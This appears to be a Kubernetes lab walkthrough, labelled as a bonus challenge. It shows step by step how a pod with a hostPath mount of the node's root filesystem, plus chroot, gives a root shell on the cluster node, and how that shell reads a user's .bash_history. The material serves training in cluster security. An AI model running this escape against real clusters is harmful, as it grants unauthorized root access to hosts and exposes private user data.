Bonus Walkthroughs

Challenge 1

Get a root shell on the cluster node again. Find out the image name that was last run directly with docker commands by the kubernetes user.

1. Create a "hostpath volume mount" pod manifest.

   cat > hostpath.yml <<EOF
   ---
   apiVersion: v1
   kind: Pod
   metadata:
     name: hostpath
   spec:
     containers:
     - name: hostpath
       image: busybox:latest
       command:
         - sleep
         - "86400"
       volumeMounts:
         - name: rootfs
           mountPath: /rootfs
     restartPolicy: Always
     volumes:
       - name: rootfs
         hostPath:
           path: /
   EOF
   

2. Create the pod that mounts the host filesystem's / at /rootfs inside the container.

   kubectl apply -f hostpath.yml
   

3. Use kubectl exec to get a shell inside the hostpath pod in the default namespace.

   kubectl exec -it hostpath /bin/sh
   

4. Use the chroot command to switch the filesystem root to the /rootfs of the container and run a bash shell.

   chroot /rootfs /bin/bash
   

5. Navigate to the home directory of the kubernetes user on the host filesystem, and examine the shell history for the image that was run manually with a docker run invocation.

   cd /home/kubernetes
   ls
   

   cat .bash_history
   

6. Exit from the chroot shell.

   exit
   

   1. Exit from the kubectl exec into the pod.

   exit
   

7. Clean up after our pod escape.

   kubectl delete -f hostpath.yml